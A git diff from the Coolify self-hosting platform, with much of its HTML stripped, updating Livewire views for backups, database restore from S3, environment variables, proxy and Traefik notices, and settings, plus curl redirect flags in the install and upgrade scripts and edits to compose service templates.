- @if ($application->settings->is_static || $application->build_pack === 'static') - @else - @if ($application->settings->is_container_label_readonly_enabled === false) - - @else - + @if ((int) $application->compose_parsing_version >= 3) +
+ +
@endif - @endif - @if (!$application->destination->server->isSwarm()) - - @endif - @if (!$application->destination->server->isSwarm()) - - @endif -
- -

HTTP Basic Authentication

-
-
- -
- @if ($application->is_http_basic_auth_enabled) -
- - +
+
@endif -
- - @if ($application->settings->is_container_label_readonly_enabled) - - @else - +
+ + {{-- --}} +
+
@endif -
- - -
- @can('update', $application) - + @endif + @if ($application->build_pack !== 'dockercompose') +

Network

+ @if ($this->detectedPortInfo) + @if ($this->detectedPortInfo['isEmpty']) +
+ + + +
+ PORT environment variable detected + ({{ $this->detectedPortInfo['port'] }}) +

Your Ports Exposes field is empty. Consider setting it to + {{ $this->detectedPortInfo['port'] }} to ensure the proxy routes traffic + correctly.

+
+
+ @elseif (!$this->detectedPortInfo['matches']) +
+ + + +
+ PORT mismatch detected +

Your PORT environment variable is set to + {{ $this->detectedPortInfo['port'] }}, but it's not in your Ports Exposes + configuration. Ensure they match for proper proxy routing.

+
+
+ @else +
+ + + +
+ PORT environment variable configured +

Your PORT environment variable ({{ $this->detectedPortInfo['port'] }}) matches + your Ports Exposes configuration.

+
+
+ @endif + @endif +
+ @if ($application->settings->is_static || $application->build_pack === 'static') + + @else + @if ($application->settings->is_container_label_readonly_enabled === false) + + @else + + @endif + @endif + @if (!$application->destination->server->isSwarm()) + + @endif + @if (!$application->destination->server->isSwarm()) + + @endif +
+ +

HTTP Basic Authentication

+
+
+ +
+ @if ($application->is_http_basic_auth_enabled) +
+ + +
+ @endif +
+ + @if ($application->settings->is_container_label_readonly_enabled) + + @else + + @endif +
+ + +
+ @can('update', $application) + - @endcan - @endif + confirmationLabel="Please confirm the execution of the actions by entering the Application URL below" + shortConfirmationLabel="Application URL" :confirmWithPassword="false" + step2ButtonText="Permanently Reset Labels" /> + @endcan + @endif -

Pre/Post Deployment Commands

-
- - @if ($application->build_pack === 'dockercompose') - - @endif +

Pre/Post Deployment Commands

+
+ + @if ($application->build_pack === 'dockercompose') + + @endif +
+
+ + @if ($application->build_pack === 'dockercompose') + + @endif +
-
- - @if ($application->build_pack === 'dockercompose') - - @endif -
-
- + @script - + @endscript -
+
\ No newline at end of file diff --git a/resources/views/livewire/project/application/heading.blade.php b/resources/views/livewire/project/application/heading.blade.php index 1a8812929..d739a81b1 100644 --- a/resources/views/livewire/project/application/heading.blade.php +++ b/resources/views/livewire/project/application/heading.blade.php @@ -12,7 +12,14 @@ - Logs +
+ Logs + @if ($application->restart_count > 0 && !str($application->status)->startsWith('exited')) + + + + @endif +
@if (!$application->destination->server->isSwarm()) @can('canAccessTerminal') diff --git a/resources/views/livewire/project/database/backup-executions.blade.php b/resources/views/livewire/project/database/backup-executions.blade.php index 30eef5976..c56908f50 100644 --- a/resources/views/livewire/project/database/backup-executions.blade.php +++ b/resources/views/livewire/project/database/backup-executions.blade.php @@ -68,22 +68,21 @@ class="flex flex-col gap-4">
- Started: {{ formatDateInServerTimezone(data_get($execution, 'created_at'), $this->server()) }} - @if (data_get($execution, 'status') !== 'running') -
Ended: - {{ formatDateInServerTimezone(data_get($execution, 'finished_at'), $this->server()) }} -
Duration: - {{ calculateDuration(data_get($execution, 'created_at'), data_get($execution, 'finished_at')) }} -
Finished {{ \Carbon\Carbon::parse(data_get($execution, 'finished_at'))->diffForHumans() }} + @if (data_get($execution, 'status') === 'running') + + Running for {{ calculateDuration(data_get($execution, 'created_at'), now()) }} + + @else + + {{ \Carbon\Carbon::parse(data_get($execution, 'finished_at'))->diffForHumans() }} + ({{ calculateDuration(data_get($execution, 'created_at'), data_get($execution, 'finished_at')) }}) + • {{ \Carbon\Carbon::parse(data_get($execution, 'finished_at'))->format('M j, H:i') }} + + @endif + • Database: {{ data_get($execution, 'database_name', 'N/A') }} + @if(data_get($execution, 'size')) + • Size: {{ formatBytes(data_get($execution, 'size')) }} @endif -
-
- Database: {{ data_get($execution, 'database_name', 'N/A') }} -
-
- Size: {{ data_get($execution, 'size') }} B / - {{ round((int) data_get($execution, 'size') / 1024, 2) }} kB / - {{ round((int) data_get($execution, 'size') / 1024 / 1024, 3) }} MB
Location: {{ data_get($execution, 'filename', 'N/A') }} diff --git a/resources/views/livewire/project/database/heading.blade.php b/resources/views/livewire/project/database/heading.blade.php index b09adcc4e..0e67a3606 100644 --- a/resources/views/livewire/project/database/heading.blade.php +++ b/resources/views/livewire/project/database/heading.blade.php @@ -3,7 +3,9 @@ Database Startup - +
+ +
diff --git a/resources/views/livewire/project/database/import.blade.php b/resources/views/livewire/project/database/import.blade.php index c6501e031..3e8069d7e 100644 --- a/resources/views/livewire/project/database/import.blade.php +++ b/resources/views/livewire/project/database/import.blade.php @@ -1,54 +1,65 @@ -
+
@script - + @endscript

Import Backup

@if ($unsupported)
Database restore is not supported.
@else
- + This is a destructive action, existing data will be replaced!
@if (str(data_get($resource, 'status'))->startsWith('running')) + {{-- Restore Command Configuration --}} @if ($resource->type() === 'standalone-postgresql') @if ($dumpAll) @endif
- +
@elseif ($resource->type() === 'standalone-mysql') @if ($dumpAll) @@ -73,8 +83,7 @@ @endif
- +
@elseif ($resource->type() === 'standalone-mariadb') @if ($dumpAll) @@ -84,35 +93,145 @@ @endif
- +
@endif -

Backup File

-
- - Check File -
-
- Or -
-
- @csrf -
-
- -
-

File Information

-
-
Location: /
- Restore Backup -
-
- + + {{-- Restore Type Selection Boxes --}} +

Choose Restore Method

+
+
+
+ + + +

Restore from File

+

Upload a backup file or specify a file path on the server

+
+
+ + @if ($availableS3Storages->count() > 0) +
+
+ + + +

Restore from S3

+

Download and restore a backup from S3 storage

+
+
+ @endif
+ + {{-- File Restore Section --}} + @can('update', $resource) +
+

Backup File

+
+ + Check File +
+
+ Or +
+
+ @csrf +
+
+ +
+ +
+

File Information

+
Location:
+
+ + + Restore Database from File + + This will perform the following actions: +
    +
  • Copy backup file to database container
    • +
  • Execute restore command
    • +
+
WARNING: This will REPLACE all existing data!
+ +
+
+
+ @endcan + + {{-- S3 Restore Section --}} + @if ($availableS3Storages->count() > 0) + @can('update', $resource) +
+

Restore from S3

+
+ + + @foreach ($availableS3Storages as $storage) + + @endforeach + + + + +
+ + Check File + +
+ + @if ($s3FileSize) +
+

File Information

+
Location: {{ $s3Path }} {{ formatBytes($s3FileSize ?? 0) }}
+
+ + + Restore Database from S3 + + This will perform the following actions: +
    +
  • Download backup from S3 storage
    • +
  • Copy file into database container
    • +
  • Execute restore command
    • +
+
WARNING: This will REPLACE all existing data!
+ +
+
+ @endif +
+
+ @endcan + @endif + + {{-- Slide-over for activity monitor (all restore operations) --}} + + Database Restore Output + +
+ +
+ + @else
Database must be running to restore a backup.
@endif @endif -
+
\ No newline at end of file diff --git a/resources/views/livewire/project/database/scheduled-backups.blade.php b/resources/views/livewire/project/database/scheduled-backups.blade.php index c0b8647b2..0d4b58972 100644 --- a/resources/views/livewire/project/database/scheduled-backups.blade.php +++ b/resources/views/livewire/project/database/scheduled-backups.blade.php @@ -70,32 +70,32 @@ class="px-3 py-1 rounded-md text-xs font-medium tracking-wide shadow-xs bg-gray-
@if ($backup->latest_log) - Started: - {{ formatDateInServerTimezone(data_get($backup->latest_log, 'created_at'), $backup->server()) }} - @if (data_get($backup->latest_log, 'status') !== 'running') -
Ended: - {{ formatDateInServerTimezone(data_get($backup->latest_log, 'finished_at'), $backup->server()) }} -
Duration: - {{ calculateDuration(data_get($backup->latest_log, 'created_at'), data_get($backup->latest_log, 'finished_at')) }} -
Finished - {{ \Carbon\Carbon::parse(data_get($backup->latest_log, 'finished_at'))->diffForHumans() }} - @endif - @if ($backup->save_s3) -
S3 Storage: Enabled + @if (data_get($backup->latest_log, 'status') === 'running') + + Running for {{ calculateDuration(data_get($backup->latest_log, 'created_at'), now()) }} + + @else + + {{ \Carbon\Carbon::parse(data_get($backup->latest_log, 'finished_at'))->diffForHumans() }} + ({{ calculateDuration(data_get($backup->latest_log, 'created_at'), data_get($backup->latest_log, 'finished_at')) }}) + • {{ \Carbon\Carbon::parse(data_get($backup->latest_log, 'finished_at'))->format('M j, H:i') }} + @endif @if (data_get($backup->latest_log, 'status') === 'success') @php $size = data_get($backup->latest_log, 'size', 0); - $sizeFormatted = - $size > 0 ? number_format($size / 1024 / 1024, 2) . ' MB' : 'Unknown'; @endphp -
Last Backup Size: {{ $sizeFormatted }} + @if ($size > 0) + • Size: {{ formatBytes($size) }} + @endif + @endif + @if ($backup->save_s3) + • S3: Enabled @endif @else - Last Run: Never -
Total Executions: 0 + Last Run: Never • Total Executions: 0 @if ($backup->save_s3) -
S3 Storage: Enabled + • S3: Enabled @endif @endif
@@ -154,27 +154,36 @@ class="px-3 py-1 rounded-md text-xs font-medium tracking-wide shadow-xs bg-gray-
@if ($backup->latest_log) - Started: - {{ formatDateInServerTimezone(data_get($backup->latest_log, 'created_at'), $backup->server()) }} - @if (data_get($backup->latest_log, 'status') !== 'running') -
Ended: - {{ formatDateInServerTimezone(data_get($backup->latest_log, 'finished_at'), $backup->server()) }} -
Duration: - {{ calculateDuration(data_get($backup->latest_log, 'created_at'), data_get($backup->latest_log, 'finished_at')) }} -
Finished - {{ \Carbon\Carbon::parse(data_get($backup->latest_log, 'finished_at'))->diffForHumans() }} + @if (data_get($backup->latest_log, 'status') === 'running') + + Running for {{ calculateDuration(data_get($backup->latest_log, 'created_at'), now()) }} + + @else + + {{ \Carbon\Carbon::parse(data_get($backup->latest_log, 'finished_at'))->diffForHumans() }} + ({{ calculateDuration(data_get($backup->latest_log, 'created_at'), data_get($backup->latest_log, 'finished_at')) }}) + • {{ \Carbon\Carbon::parse(data_get($backup->latest_log, 'finished_at'))->format('M j, H:i') }} + + @endif + @if (data_get($backup->latest_log, 'status') === 'success') + @php + $size = data_get($backup->latest_log, 'size', 0); + @endphp + @if ($size > 0) + • Size: {{ formatBytes($size) }} + @endif @endif -

Total Executions: {{ $backup->executions()->count() }} @if ($backup->save_s3) -
S3 Storage: Enabled + • S3: Enabled @endif +
Total Executions: {{ $backup->executions()->count() }} @php $successCount = $backup->executions()->where('status', 'success')->count(); $totalCount = $backup->executions()->count(); $successRate = $totalCount > 0 ? round(($successCount / $totalCount) * 100) : 0; @endphp @if ($totalCount > 0) -
Success Rate: $successRate >= 80, 'text-yellow-600' => $successRate >= 50 && $successRate < 80, @@ -182,19 +191,10 @@ class="px-3 py-1 rounded-md text-xs font-medium tracking-wide shadow-xs bg-gray- ])>{{ $successRate }}% ({{ $successCount }}/{{ $totalCount }}) @endif - @if (data_get($backup->latest_log, 'status') === 'success') - @php - $size = data_get($backup->latest_log, 'size', 0); - $sizeFormatted = - $size > 0 ? number_format($size / 1024 / 1024, 2) . ' MB' : 'Unknown'; - @endphp -
Last Backup Size: {{ $sizeFormatted }} - @endif @else - Last Run: Never -
Total Executions: 0 + Last Run: Never • Total Executions: 0 @if ($backup->save_s3) -
S3 Storage: Enabled + • S3: Enabled @endif @endif
diff --git a/resources/views/livewire/project/resource/index.blade.php b/resources/views/livewire/project/resource/index.blade.php index 807eb89b4..545c368a3 100644 --- a/resources/views/livewire/project/resource/index.blade.php +++ b/resources/views/livewire/project/resource/index.blade.php @@ -118,7 +118,7 @@ class="grid grid-cols-1 gap-4 pt-4 lg:grid-cols-2 xl:grid-cols-3">
@@ -167,7 +167,7 @@ class="grid grid-cols-1 gap-4 pt-4 lg:grid-cols-2 xl:grid-cols-3">
@@ -216,7 +216,7 @@ class="grid grid-cols-1 gap-4 pt-4 lg:grid-cols-2 xl:grid-cols-3">
diff --git a/resources/views/livewire/project/service/configuration.blade.php b/resources/views/livewire/project/service/configuration.blade.php index 452808282..9b81e4bec 100644 --- a/resources/views/livewire/project/service/configuration.blade.php +++ b/resources/views/livewire/project/service/configuration.blade.php @@ -66,7 +66,7 @@ @if ($application->fqdn) {{ Str::limit($application->fqdn, 60) }} @can('update', $service) - + @endif -
{{ $application->status }}
+
{{ formatContainerStatus($application->status) }}
description) {{ Str::limit($database->description, 60) }} @endif -
{{ $database->status }}
+
{{ formatContainerStatus($database->status) }}
@if ($database->isBackupSolutionAvailable() || $database->is_migrated) diff --git a/resources/views/livewire/project/service/heading.blade.php b/resources/views/livewire/project/service/heading.blade.php index 73635d93a..bb1bfb0fc 100644 --- a/resources/views/livewire/project/service/heading.blade.php +++ b/resources/views/livewire/project/service/heading.blade.php @@ -34,7 +34,7 @@ - + diff --git a/resources/views/livewire/project/shared/environment-variable/add.blade.php b/resources/views/livewire/project/shared/environment-variable/add.blade.php index 353fe02de..9bc4f06a3 100644 --- a/resources/views/livewire/project/shared/environment-variable/add.blade.php +++ b/resources/views/livewire/project/shared/environment-variable/add.blade.php @@ -1,8 +1,20 @@
- - + @if ($is_multiline) + + @else + + @endif + + @if (!$shared && !$is_multiline) +
+ Tip: Type {{ to reference a shared environment + variable +
+ @endif @if (!$shared) Save - + \ No newline at end of file diff --git a/resources/views/livewire/project/shared/environment-variable/show.blade.php b/resources/views/livewire/project/shared/environment-variable/show.blade.php index 1995bda9c..68e1d7e7d 100644 --- a/resources/views/livewire/project/shared/environment-variable/show.blade.php +++ b/resources/views/livewire/project/shared/environment-variable/show.blade.php @@ -37,29 +37,23 @@ helper="This means that when you use $VARIABLES in a value, it should be interpreted as the actual characters '$VARIABLES' and not as the value of a variable named VARIABLE.

Useful if you have $ sign in your value and there are some characters after it, but you would not like to interpolate it from another value. In this case, you should set this to true." label="Is Literal?" /> @else - @if ($is_shared) - + @if ($isSharedVariable) + @else - @if ($isSharedVariable) + @if (!$env->is_nixpacks) + + @endif + + @if (!$env->is_nixpacks) - @else - @if (!$env->is_nixpacks) - - @endif - - @if (!$env->is_nixpacks) - - @if ($is_multiline === false) - - @endif + @if ($is_multiline === false) + @endif @endif @endif @@ -83,26 +77,22 @@ helper="This means that when you use $VARIABLES in a value, it should be interpreted as the actual characters '$VARIABLES' and not as the value of a variable named VARIABLE.

Useful if you have $ sign in your value and there are some characters after it, but you would not like to interpolate it from another value. In this case, you should set this to true." label="Is Literal?" /> @else - @if ($is_shared) - + @if ($isSharedVariable) + @else - @if ($isSharedVariable) - - @else + @if (!$env->is_nixpacks) - - - @if ($is_multiline === false) - - @endif + @endif + + + @if ($is_multiline === false) + @endif @endif @endif @@ -115,7 +105,13 @@ @if ($isDisabled)
- + @if ($is_shared) @endif @@ -127,7 +123,13 @@ @else - + @endif @if ($is_shared) @@ -137,7 +139,13 @@ @else
- + @if ($is_shared) @endif @@ -159,29 +167,23 @@ helper="This means that when you use $VARIABLES in a value, it should be interpreted as the actual characters '$VARIABLES' and not as the value of a variable named VARIABLE.

Useful if you have $ sign in your value and there are some characters after it, but you would not like to interpolate it from another value. In this case, you should set this to true." label="Is Literal?" /> @else - @if ($is_shared) - + @if ($isSharedVariable) + @else - @if ($isSharedVariable) + @if (!$env->is_nixpacks) + + @endif + + @if (!$env->is_nixpacks) - @else - @if (!$env->is_nixpacks) - - @endif - - @if (!$env->is_nixpacks) - - @if ($is_multiline === false) - - @endif + @if ($is_multiline === false) + @endif @endif @endif @@ -227,26 +229,22 @@ helper="This means that when you use $VARIABLES in a value, it should be interpreted as the actual characters '$VARIABLES' and not as the value of a variable named VARIABLE.

Useful if you have $ sign in your value and there are some characters after it, but you would not like to interpolate it from another value. In this case, you should set this to true." label="Is Literal?" /> @else - @if ($is_shared) - + @if ($isSharedVariable) + @else - @if ($isSharedVariable) - - @else + @if (!$env->is_nixpacks) - - - @if ($is_multiline === false) - - @endif + @endif + + + @if ($is_multiline === false) + @endif @endif @endif diff --git a/resources/views/livewire/project/shared/scheduled-task/add.blade.php b/resources/views/livewire/project/shared/scheduled-task/add.blade.php index 0c4b8a4d6..6fa04c28b 100644 --- a/resources/views/livewire/project/shared/scheduled-task/add.blade.php +++ b/resources/views/livewire/project/shared/scheduled-task/add.blade.php @@ -4,6 +4,9 @@ + @if ($type === 'application') @if ($containerNames->count() > 1) diff --git a/resources/views/livewire/project/shared/scheduled-task/show.blade.php b/resources/views/livewire/project/shared/scheduled-task/show.blade.php index 1ede7775a..fa2ce0ad9 100644 --- a/resources/views/livewire/project/shared/scheduled-task/show.blade.php +++ b/resources/views/livewire/project/shared/scheduled-task/show.blade.php @@ -35,6 +35,8 @@ + @if ($type === 'application') - + Proxy Startup Logs @@ -56,112 +56,106 @@ class="mx-1 dark:hover:fill-white fill-black dark:fill-warning">
@if ($server->proxySet()) - - Proxy Status - - - - @if ($proxyStatus === 'running') -
-
- -
- @if ($traefikDashboardAvailable) - - @endif - - - - +
+
+ +
+ @if ($traefikDashboardAvailable) + + @endif + + + + + + + + + Restart Proxy + + + + + + + + - - - - Restart Proxy - - - - - - - - - - - - Stop Proxy - - -
+ d="M14 5m0 1a1 1 0 0 1 1 -1h2a1 1 0 0 1 1 1v12a1 1 0 0 1 -1 1h-2a1 1 0 0 1 -1 -1z"> + + + Stop Proxy + + +
@else
-
+
\ No newline at end of file diff --git a/resources/views/livewire/server/proxy.blade.php b/resources/views/livewire/server/proxy.blade.php index 46859095f..77e856864 100644 --- a/resources/views/livewire/server/proxy.blade.php +++ b/resources/views/livewire/server/proxy.blade.php @@ -21,7 +21,15 @@ @endif Save
-
Configure your proxy settings and advanced options.
+
Configure your proxy settings and advanced options.
+ @if ( + $server->proxy->last_applied_settings && + $server->proxy->last_saved_settings !== $server->proxy->last_applied_settings) + + The saved proxy configuration differs from the currently running configuration. Restart the + proxy to apply your changes. + + @endif

Advanced

proxyType() === ProxyTypes::TRAEFIK->value || $server->proxyType() === 'CADDY') -
-

{{ $proxyTitle }}

- @if ($proxySettings) +
proxyType() === ProxyTypes::TRAEFIK->value) x-data="{ traefikWarningsDismissed: localStorage.getItem('callout-dismissed-traefik-warnings-{{ $server->id }}') === 'true' }" @endif> +
+

{{ $proxyTitle }}

@can('update', $server) - - +
+ Reset Configuration +
+
+ @if ($proxySettings) + + + @endif +
@endcan + @if ($server->proxyType() === ProxyTypes::TRAEFIK->value) + + @endif +
+ @if ($server->proxyType() === ProxyTypes::TRAEFIK->value) +
+ @if ($server->detected_traefik_version === 'latest') + + Your proxy container is running the latest tag. While + this ensures you always have the newest version, it may introduce unexpected breaking + changes. +

+ Recommendation: Pin to a specific version (e.g., traefik:{{ $this->latestTraefikVersion }}) to ensure + stability and predictable updates. + + @elseif($this->isTraefikOutdated) + + Your Traefik proxy container is running version v{{ $server->detected_traefik_version }}, but version {{ $this->latestTraefikVersion }} is available. +

+ Recommendation: Update to the latest patch version for security fixes + and + bug fixes. Please test in a non-production environment first. + + @endif + @if ($this->newerTraefikBranchAvailable) + + A new minor version of Traefik is available: {{ $this->newerTraefikBranchAvailable }} +

+ You are currently running v{{ $server->detected_traefik_version }}. + Upgrading to {{ $this->newerTraefikBranchAvailable }} will give you access to new features and improvements. +

+ Important: Before upgrading to a new minor version, please read + the Traefik changelog to understand breaking changes + and new features. +

+ Recommendation: Test the upgrade in a non-production environment first. + + @endif +
@endif
@endif - @if ( - $server->proxy->last_applied_settings && - $server->proxy->last_saved_settings !== $server->proxy->last_applied_settings) -
Configuration out of sync. Restart the proxy to apply the new - configurations. -
- @endif
diff --git a/resources/views/livewire/server/validate-and-install.blade.php b/resources/views/livewire/server/validate-and-install.blade.php index 572da85e8..85ea3105e 100644 --- a/resources/views/livewire/server/validate-and-install.blade.php +++ b/resources/views/livewire/server/validate-and-install.blade.php @@ -52,6 +52,30 @@ @endif @endif @if ($uptime && $supported_os_type) + @if ($prerequisites_installed) +
Prerequisites are installed: + + + + +
+ @else + @if ($error) +
Prerequisites are installed: + +
+ @else +
+ @endif + @endif + @endif + @if ($uptime && $supported_os_type && $prerequisites_installed) @if ($docker_installed)
Docker is installed: @@ -120,7 +144,7 @@ @endif @endif - + @isset($error) 
{!! $error !!}
diff --git a/resources/views/livewire/settings/index.blade.php b/resources/views/livewire/settings/index.blade.php index 4ceb2043a..deba90291 100644 --- a/resources/views/livewire/settings/index.blade.php +++ b/resources/views/livewire/settings/index.blade.php @@ -1,28 +1,29 @@
Settings | Coolify - - -
- -
-
-

General

- - Save - -
-
General configuration for your Coolify instance.
+ + +
+ + +
+

General

+ + Save + +
+
General configuration for your Coolify instance.
-
-
-
- - -
+
+
+ + +
-
- - -
-
-
- - - - +
+ +
-
- +
+
+ + + + +
+
+ +
-
-
- - -
- @if(isDev()) -
- -
- @endif +
+ + +
+ + @if($buildActivityId) +
+ +
+ @endif + @if(isDev()) + + @endif
-
- - - - -
    -
  • The Coolify instance domain will conflict with existing resources
    • -
  • SSL certificates might not work correctly
    • -
  • Routing behavior will be unpredictable
    • -
  • You may not be able to access the Coolify dashboard properly
    • -
- - -
-
+ + + + +
    +
  • The Coolify instance domain will conflict with existing resources
    • +
  • SSL certificates might not work correctly
    • +
  • Routing behavior will be unpredictable
    • +
  • You may not be able to access the Coolify dashboard properly
    • +
+ + +
+
\ No newline at end of file diff --git a/resources/views/livewire/shared-variables/environment/show.blade.php b/resources/views/livewire/shared-variables/environment/show.blade.php index 0799a7422..fde2d0ae8 100644 --- a/resources/views/livewire/shared-variables/environment/show.blade.php +++ b/resources/views/livewire/shared-variables/environment/show.blade.php @@ -9,17 +9,26 @@ @endcan + {{ $view === 'normal' ? 'Developer view' : 'Normal view' }}
You can use these variables anywhere with @{{ environment.VARIABLENAME }}
-
- @forelse ($environment->environment_variables->sort()->sortBy('key') as $env) - - @empty -
No environment variables found.
- @endforelse -
+ @if ($view === 'normal') +
+ @forelse ($environment->environment_variables->sort()->sortBy('key') as $env) + + @empty +
No environment variables found.
+ @endforelse +
+ @else +
+ + Save All Environment Variables +
+ @endif
diff --git a/resources/views/livewire/shared-variables/project/show.blade.php b/resources/views/livewire/shared-variables/project/show.blade.php index 7db3b61a2..f89ad9ce7 100644 --- a/resources/views/livewire/shared-variables/project/show.blade.php +++ b/resources/views/livewire/shared-variables/project/show.blade.php @@ -9,6 +9,7 @@ @endcan + {{ $view === 'normal' ? 'Developer view' : 'Normal view' }}
You can use these variables anywhere with
@@ -16,12 +17,20 @@
-
- @forelse ($project->environment_variables->sort()->sortBy('key') as $env) - - @empty -
No environment variables found.
- @endforelse -
+ @if ($view === 'normal') +
+ @forelse ($project->environment_variables->sort()->sortBy('key') as $env) + + @empty +
No environment variables found.
+ @endforelse +
+ @else +
+ + Save All Environment Variables +
+ @endif
diff --git a/resources/views/livewire/shared-variables/team/index.blade.php b/resources/views/livewire/shared-variables/team/index.blade.php index 1fbdfc2c5..fcfca35fb 100644 --- a/resources/views/livewire/shared-variables/team/index.blade.php +++ b/resources/views/livewire/shared-variables/team/index.blade.php @@ -9,18 +9,27 @@ @endcan + {{ $view === 'normal' ? 'Developer view' : 'Normal view' }}
You can use these variables anywhere with @{{ team.VARIABLENAME }}
-
- @forelse ($team->environment_variables->sort()->sortBy('key') as $env) - - @empty -
No environment variables found.
- @endforelse -
+ @if ($view === 'normal') +
+ @forelse ($team->environment_variables->sort()->sortBy('key') as $env) + + @empty +
No environment variables found.
+ @endforelse +
+ @else +
+ + Save All Environment Variables +
+ @endif
diff --git a/scripts/install.sh b/scripts/install.sh index f75ac8f73..c8b791185 100755 --- a/scripts/install.sh +++ b/scripts/install.sh @@ -288,9 +288,9 @@ if [ "$OS_TYPE" = 'amzn' ]; then dnf install -y findutils >/dev/null fi -LATEST_VERSION=$(curl --silent $CDN/versions.json | grep -i version | xargs | awk '{print $2}' | tr -d ',') -LATEST_HELPER_VERSION=$(curl --silent $CDN/versions.json | grep -i version | xargs | awk '{print $6}' | tr -d ',') -LATEST_REALTIME_VERSION=$(curl --silent $CDN/versions.json | grep -i version | xargs | awk '{print $8}' | tr -d ',') +LATEST_VERSION=$(curl -L --silent $CDN/versions.json | grep -i version | xargs | awk '{print $2}' | tr -d ',') +LATEST_HELPER_VERSION=$(curl -L --silent $CDN/versions.json | grep -i version | xargs | awk '{print $6}' | tr -d ',') +LATEST_REALTIME_VERSION=$(curl -L --silent $CDN/versions.json | grep -i version | xargs | awk '{print $8}' | tr -d ',') if [ -z "$LATEST_HELPER_VERSION" ]; then LATEST_HELPER_VERSION=latest @@ -705,10 +705,10 @@ else fi echo -e "5. Download required files from CDN. " -curl -fsSL $CDN/docker-compose.yml -o /data/coolify/source/docker-compose.yml -curl -fsSL $CDN/docker-compose.prod.yml -o /data/coolify/source/docker-compose.prod.yml -curl -fsSL $CDN/.env.production -o /data/coolify/source/.env.production -curl -fsSL $CDN/upgrade.sh -o /data/coolify/source/upgrade.sh +curl -fsSL -L $CDN/docker-compose.yml -o /data/coolify/source/docker-compose.yml +curl -fsSL -L $CDN/docker-compose.prod.yml -o /data/coolify/source/docker-compose.prod.yml +curl -fsSL -L $CDN/.env.production -o /data/coolify/source/.env.production +curl -fsSL -L $CDN/upgrade.sh -o /data/coolify/source/upgrade.sh echo -e "6. Setting up environment variable file" diff --git a/scripts/upgrade.sh b/scripts/upgrade.sh index 8340d95b0..9a55f330a 100644 --- a/scripts/upgrade.sh +++ b/scripts/upgrade.sh @@ -11,9 +11,9 @@ ENV_FILE="/data/coolify/source/.env" DATE=$(date +%Y-%m-%d-%H-%M-%S) LOGFILE="/data/coolify/source/upgrade-${DATE}.log" -curl -fsSL $CDN/docker-compose.yml -o /data/coolify/source/docker-compose.yml -curl -fsSL $CDN/docker-compose.prod.yml -o /data/coolify/source/docker-compose.prod.yml -curl -fsSL $CDN/.env.production -o /data/coolify/source/.env.production +curl -fsSL -L $CDN/docker-compose.yml -o /data/coolify/source/docker-compose.yml +curl -fsSL -L $CDN/docker-compose.prod.yml -o /data/coolify/source/docker-compose.prod.yml +curl -fsSL -L $CDN/.env.production -o /data/coolify/source/.env.production # Backup existing .env file before making any changes if [ "$SKIP_BACKUP" != "true" ]; then diff --git a/templates/compose/codimd.yaml b/templates/compose/codimd.yaml index 39d44258a..fe947898f 100644 --- a/templates/compose/codimd.yaml +++ b/templates/compose/codimd.yaml @@ -10,8 +10,8 @@ services: image: nabo.codimd.dev/hackmdio/hackmd:latest environment: - SERVICE_URL_CODIMD_3000 - - CMD_DOMAIN=${SERVICE_URL_CODIMD} - - CMD_PROTOCOL_USESSL=${CMD_PROTOCOL_USESSL:-false} + - CMD_DOMAIN=${SERVICE_FQDN_CODIMD} + - CMD_PROTOCOL_USESSL=${CMD_PROTOCOL_USESSL:-true} - CMD_SESSION_SECRET=${SERVICE_PASSWORD_SESSIONSECRET} - CMD_USECDN=${CMD_USECDN:-false} - CMD_DB_URL=postgres://${SERVICE_USER_POSTGRES}:${SERVICE_PASSWORD_POSTGRES}@postgres:5432/${POSTGRES_DB:-codimd-db} diff --git a/templates/compose/convex.yaml b/templates/compose/convex.yaml index ad8728ee1..49f2449df 100644 --- a/templates/compose/convex.yaml +++ b/templates/compose/convex.yaml @@ -17,7 +17,7 @@ services: - CONVEX_RELEASE_VERSION_DEV=${CONVEX_RELEASE_VERSION_DEV:-} - ACTIONS_USER_TIMEOUT_SECS=${ACTIONS_USER_TIMEOUT_SECS:-} # URL of the Convex API as accessed by the client/frontend. - - CONVEX_CLOUD_ORIGIN=${SERVICE_URL_CONVEX} + - CONVEX_CLOUD_ORIGIN=${SERVICE_URL_DASHBOARD} # URL of Convex HTTP actions as accessed by the client/frontend. - CONVEX_SITE_ORIGIN=${SERVICE_URL_BACKEND} - DATABASE_URL=${DATABASE_URL:-} @@ -49,7 +49,7 @@ services: dashboard: image: ghcr.io/get-convex/convex-dashboard:33cef775a8a6228cbacee4a09ac2c4073d62ed13 environment: - - SERVICE_URL_CONVEX_6791 + - SERVICE_URL_DASHBOARD_6791 # URL of the Convex API as accessed by the dashboard (browser). - NEXT_PUBLIC_DEPLOYMENT_URL=${SERVICE_URL_BACKEND} depends_on: diff --git a/templates/compose/documenso.yaml b/templates/compose/documenso.yaml index 8536945ab..5c1398db5 100644 --- a/templates/compose/documenso.yaml +++ b/templates/compose/documenso.yaml @@ -30,6 +30,9 @@ services: - NEXT_PRIVATE_DIRECT_DATABASE_URL=postgresql://${SERVICE_USER_POSTGRES}:${SERVICE_PASSWORD_POSTGRES}@database/${POSTGRES_DB:-documenso-db}?schema=public - NEXT_PRIVATE_SIGNING_LOCAL_FILE_PATH=/app/apps/remix/certs/certificate.p12 - NEXT_PRIVATE_SIGNING_PASSPHRASE=${SERVICE_PASSWORD_DOCUMENSO} + - NEXT_PRIVATE_SIGNING_TRANSPORT=local + - NEXT_PRIVATE_SIGNING_LOCAL_FILE_PATH=/app/certs/cert.p12 + - NEXT_PRIVATE_SIGNING_LOCAL_FILE_PASSPHRASE=${SERVICE_PASSWORD_DOCUMENSO} - CERT_VALID_DAYS=${CERT_VALID_DAYS:-365} - CERT_INFO_COUNTRY_NAME=${CERT_INFO_COUNTRY_NAME:-DO} - CERT_INFO_STATE_OR_PROVIDENCE=${CERT_INFO_STATE_OR_PROVIDENCE:-Santiago} @@ -38,6 +41,7 @@ services: - CERT_INFO_ORGANIZATIONAL_UNIT=${CERT_INFO_ORGANIZATIONAL_UNIT:-IT Department} - CERT_INFO_EMAIL=${CERT_INFO_EMAIL:-example@gmail.com} - NEXT_PUBLIC_DISABLE_SIGNUP=${DISABLE_LOGIN:-false} + - SERVICE_PASSWORD_DOCUMENSO=${SERVICE_PASSWORD_DOCUMENSO:-} healthcheck: test: - CMD-SHELL @@ -49,10 +53,35 @@ services: - /bin/sh - -c - | - echo "./certs" > /tmp/certs_dir_path - echo "./make-certs.sh" > /tmp/cert_script_path - echo "${SERVICE_PASSWORD_DOCUMENSO}" > /tmp/cert_pass - + CERT_PASSPHRASE="$${NEXT_PRIVATE_SIGNING_LOCAL_FILE_PASSPHRASE}" + PASSPHRASE_FILE="/tmp/cert_passphrase" + + # 